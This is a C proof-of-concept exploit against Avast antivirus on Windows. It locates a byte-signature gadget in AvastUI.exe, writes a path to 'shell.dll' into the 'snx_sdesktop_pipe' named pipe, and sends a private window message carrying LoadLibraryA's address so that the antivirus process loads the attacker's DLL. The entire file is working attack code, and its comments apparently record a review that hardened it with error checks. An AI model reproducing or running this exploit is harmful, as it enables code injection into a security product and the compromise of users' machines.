#define UNICODE
#define _UNICODE
#include <windows.h>
#include <tchar.h>
#include <winternl.h>
#include <strsafe.h>
#pragma comment( lib, "user32" )
/*
 * Find the first occurrence of needle[0..nlen) inside haystack[0..hlen).
 * Returns a pointer into haystack at the match, or NULL when there is no
 * match.  An empty needle (nlen == 0) also yields NULL, which differs from
 * some libc memmem() implementations that return haystack in that case.
 * Only candidate positions that leave room for a full needle are examined.
 */
PBYTE memmem( PBYTE haystack, SIZE_T hlen, PBYTE needle, SIZE_T nlen )
{
    PBYTE cursor;
    PBYTE end;
    SIZE_T remaining;
    BYTE first;

    if ( nlen == 0 )
        return NULL;

    first = needle[0];
    cursor = haystack;
    end = haystack + hlen;

    for ( ;; )
    {
        remaining = ( SIZE_T )( end - cursor );
        if ( remaining < nlen )
            return NULL;

        /* memchr is bounded so that a hit always has nlen bytes after it */
        cursor = memchr( cursor, first, remaining - nlen + 1 );
        if ( cursor == NULL )
            return NULL;

        if ( memcmp( cursor, needle, nlen ) == 0 )
            return cursor;

        cursor++;
    }
}
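/*
 * Look up the section named szSectionName in the PE image mapped at pModule.
 *
 * On success writes the section's in-memory start (pModule + VirtualAddress)
 * to *ppSection, its Misc.VirtualSize rounded up to SectionAlignment to
 * *pdwSectionSize, prints both, and returns TRUE.  Returns FALSE with both
 * outputs zeroed when pModule is NULL, when the DOS / NT / optional-header
 * magic values do not match, or when no section carries that name.
 *
 * Trust boundary: no image size is passed in, so e_lfanew,
 * SizeOfOptionalHeader and NumberOfSections are taken from the headers
 * unchecked.  Only call this on an image the loader has already mapped
 * (as _tmain does via LoadLibraryEx); do not point it at raw file bytes.
 */
BOOL GetSectionInfo( PBYTE pModule, PBYTE szSectionName, PBYTE *ppSection, PDWORD pdwSectionSize )
{
    PIMAGE_DOS_HEADER pDOSHeader;
    PIMAGE_NT_HEADERS pNTHeaders;
    PIMAGE_OPTIONAL_HEADER pOptionalHeader;
    PIMAGE_SECTION_HEADER pSectionHeader;
    UINT i;

    *ppSection = NULL;
    *pdwSectionSize = 0;

    if ( NULL == pModule )
        return FALSE;

    pDOSHeader = ( PIMAGE_DOS_HEADER )pModule;
    if ( IMAGE_DOS_SIGNATURE != pDOSHeader->e_magic )
        return FALSE;

    pNTHeaders = ( PIMAGE_NT_HEADERS )( pModule + pDOSHeader->e_lfanew );
    if ( IMAGE_NT_SIGNATURE != pNTHeaders->Signature )
        return FALSE;

    pOptionalHeader = ( PIMAGE_OPTIONAL_HEADER )( &pNTHeaders->OptionalHeader );
    if ( IMAGE_NT_OPTIONAL_HDR_MAGIC != pOptionalHeader->Magic )
        return FALSE;

    /* section table immediately follows the (variable-size) optional header */
    pSectionHeader = ( PIMAGE_SECTION_HEADER )( ( PBYTE )pOptionalHeader + pNTHeaders->FileHeader.SizeOfOptionalHeader );

    for ( i = 0; i < pNTHeaders->FileHeader.NumberOfSections; i++, pSectionHeader++ )
    {
        /* IMAGE_SECTION_HEADER.Name is IMAGE_SIZEOF_SHORT_NAME (8) bytes and
         * is NOT NUL-terminated when all 8 are used, so strcmp() could read
         * past it; bound the comparison to the field width instead. */
        if ( strncmp( ( const char * )pSectionHeader->Name,
                      ( const char * )szSectionName,
                      IMAGE_SIZEOF_SHORT_NAME ) == 0 )
        {
            DWORD dwSize = pSectionHeader->Misc.VirtualSize;
            DWORD dwAlign = pOptionalHeader->SectionAlignment;

            /* round up to the section alignment; guard the modulo against a
             * zero alignment field, which would otherwise be UB */
            if ( dwAlign != 0 && dwSize % dwAlign != 0 )
                dwSize += dwAlign - ( dwSize % dwAlign );

            *ppSection = pModule + pSectionHeader->VirtualAddress;
            *pdwSectionSize = dwSize;
            /* %.8S caps the name at the 8-byte field for the same reason as above */
            _tprintf( _T( "[?] %.8S: 0x%08Ix 0x%08x\n" ), pSectionHeader->Name, *ppSection, *pdwSectionSize );
            return TRUE;
        }
    }
    return FALSE;
}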
/* Byte signature that _tmain searches for in AvastUI.exe's .text section via
 * memmem(); _tmain then reads the pointer stored in the 4 bytes immediately
 * before the match.  The pattern is specific to one build of the binary — a
 * different revision may simply not contain it, in which case memmem()
 * returns NULL.  The trailing comment gives the instruction these bytes
 * encode. */
static BYTE g_pbGadget[] = { 0x05, 0xff, 0xff, 0x55, 0x58 }; //add eax,-0A7AA0001h
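/*
 * Proof-of-concept driver.  Steps, each now checked:
 *   1. build "<current directory>\shell.dll" in a fixed 0x2c-byte record;
 *   2. map AvastUI.exe without running it (DONT_RESOLVE_DLL_REFERENCES),
 *      find its .text section and the g_pbGadget signature, and read the
 *      pointer stored 4 bytes before the match;
 *   3. locate the "asw_av_tray_icon_wndclass" window;
 *   4. write the record to \\.\pipe\snx_sdesktop_pipe ten times;
 *   5. send message 0x83fd to that window with LoadLibraryA's address and
 *      the pointer from step 2.
 * argc/argv are ignored.  Returns 0 only when every step succeeds and 1
 * otherwise (the original returned 0 on every path, so a harness could not
 * tell failure from success); the mapped module is released on the way out.
 */
int _tmain( int argc, TCHAR *argv[] )
{
    HMODULE hAvastUI = NULL;
    INT i;
    PBYTE pSection = NULL;
    DWORD dwSectionSize = 0;
    PBYTE pbGadget = NULL;
    PBYTE pbNamedPipeStructure = NULL;
    HANDLE hPipe = INVALID_HANDLE_VALUE;
    HWND hWnd = NULL;               /* FindWindow/SendMessage take an HWND, not a HANDLE */
    BYTE szDll[0x2c] = { 0 };       /* exactly sizeof szDll bytes are written to the pipe */
    DWORD dwDirLen;
    DWORD dwBytesWritten = 0;
    FARPROC pLoadLibraryA = NULL;
    int rc = 1;                     /* pessimistic; cleared only after the final step */

    ( void )argc;
    ( void )argv;

    /* GetCurrentDirectoryA returns 0 on error but the *required* length when
     * the buffer is too small, leaving the buffer untouched.  The original
     * only tested for 0 and would then carry on with an empty path, so the
     * too-small case is rejected explicitly here. */
    dwDirLen = GetCurrentDirectoryA( sizeof( szDll ), ( LPSTR )szDll );
    if ( 0 == dwDirLen )
    {
        _tprintf( _T( "[-] GetCurrentDirectoryA() failed (0x%08x)\n" ),
                  GetLastError() );
        return 1;
    }
    if ( dwDirLen >= sizeof( szDll ) )
    {
        _tprintf( _T( "[-] Current directory does not fit in %u bytes\n" ),
                  ( unsigned )sizeof( szDll ) );
        return 1;
    }
    /* StringCchCatA fails (rather than overflows) if the suffix does not fit */
    if ( FAILED( StringCchCatA( ( char * )szDll, sizeof( szDll ), "\\shell.dll" ) ) )
    {
        _tprintf( _T( "[-] StringCchCatA() failed\n" ) );
        return 1;
    }

    hAvastUI = LoadLibraryEx( _T( "C:\\Program Files\\AVAST Software\\Avast\\AvastUI.exe" ),
                              0,
                              DONT_RESOLVE_DLL_REFERENCES );
    /* the original passed a NULL handle straight into GetSectionInfo */
    if ( NULL == hAvastUI )
    {
        _tprintf( _T( "[-] LoadLibraryEx() failed (0x%08x)\n" ),
                  GetLastError() );
        return 1;
    }
    _tprintf( _T( "[?] hAvastUI = 0x%08Ix\n" ), hAvastUI );

    if ( FALSE == GetSectionInfo( ( PBYTE )hAvastUI, ( PBYTE )".text", &pSection, &dwSectionSize ) )
    {
        _tprintf( _T( "[-] AvastUI.exe '.text' section not found\n" ) );
        goto cleanup;
    }

    pbGadget = memmem( pSection, dwSectionSize, g_pbGadget, sizeof( g_pbGadget ) );
    /* The value of interest is the pointer stored in the 4 bytes before the
     * signature.  A miss (e.g. a different AvastUI build) used to become a
     * read from address -4; reject it, and a match too close to the start
     * of the section, instead. */
    if ( NULL == pbGadget || ( SIZE_T )( pbGadget - pSection ) < 4 )
    {
        _tprintf( _T( "[-] Gadget signature not found in '.text'\n" ) );
        goto cleanup;
    }
    /* memcpy instead of a PBYTE* cast: same bytes, no aliasing/alignment
     * assumptions.  NOTE(review): the read is sizeof(PBYTE) wide, so on a
     * 64-bit build it would overlap 4 bytes of the signature itself —
     * presumably this targets a 32-bit process; confirm. */
    memcpy( &pbNamedPipeStructure, pbGadget - 4, sizeof( pbNamedPipeStructure ) );
    _tprintf( _T( "[?] pbNamedPipeStructure = 0x%08Ix\n" ), pbNamedPipeStructure );

    hWnd = FindWindow( _T( "asw_av_tray_icon_wndclass" ), 0 );
    if ( NULL == hWnd )
    {
        _tprintf( _T( "[-] FindWindow() failed (0x%08x)\n" ),
                  GetLastError() );
        goto cleanup;
    }

    for ( i = 0; i < 10; i++ )
    {
        /* 0xffffffff is NMPWAIT_WAIT_FOREVER: block until an instance is free */
        WaitNamedPipe( _T( "\\\\.\\pipe\\snx_sdesktop_pipe" ),
                       0xffffffff );
        hPipe = CreateFile( _T( "\\\\.\\pipe\\snx_sdesktop_pipe" ),
                            GENERIC_WRITE,
                            0,
                            NULL,
                            OPEN_EXISTING,
                            0,
                            NULL );
        if ( INVALID_HANDLE_VALUE == hPipe )
        {
            _tprintf( _T( "[-] CreateFile() failed (0x%08x)\n" ),
                      GetLastError() );
            goto cleanup;
        }
        _tprintf( _T( "[?] Pipe successfully opened (%d)\n" ),
                  i );

        if ( FALSE == WriteFile( hPipe,
                                 szDll,
                                 sizeof( szDll ),
                                 &dwBytesWritten,
                                 NULL ) || sizeof( szDll ) != dwBytesWritten )
        {
            /* capture the error before CloseHandle can overwrite it */
            DWORD dwErr = GetLastError();
            _tprintf( _T( "[-] WriteFile() failed (0x%08x)\n" ),
                      dwErr );
            CloseHandle( hPipe );   /* the original leaked the handle on this path */
            goto cleanup;
        }
        CloseHandle( hPipe );
    }

    pLoadLibraryA = GetProcAddress( GetModuleHandle( _T( "kernel32.dll" ) ),
                                    "LoadLibraryA" );
    if ( NULL == pLoadLibraryA )
    {
        _tprintf( _T( "[-] GetProcAddress() failed (0x%08x)\n" ),
                  GetLastError() );
        goto cleanup;
    }

    /* 0x83fd lies above WM_APP (0x8000): an application-private message whose
     * meaning is defined by the receiving window and is not shown here. */
    SendMessage( hWnd,
                 0x83fd,
                 ( WPARAM )pLoadLibraryA,
                 ( LPARAM )pbNamedPipeStructure );
    rc = 0;

cleanup:
    /* FreeLibrary(NULL) is never reached: every path before LoadLibraryEx returns directly */
    FreeLibrary( hAvastUI );
    return rc;
}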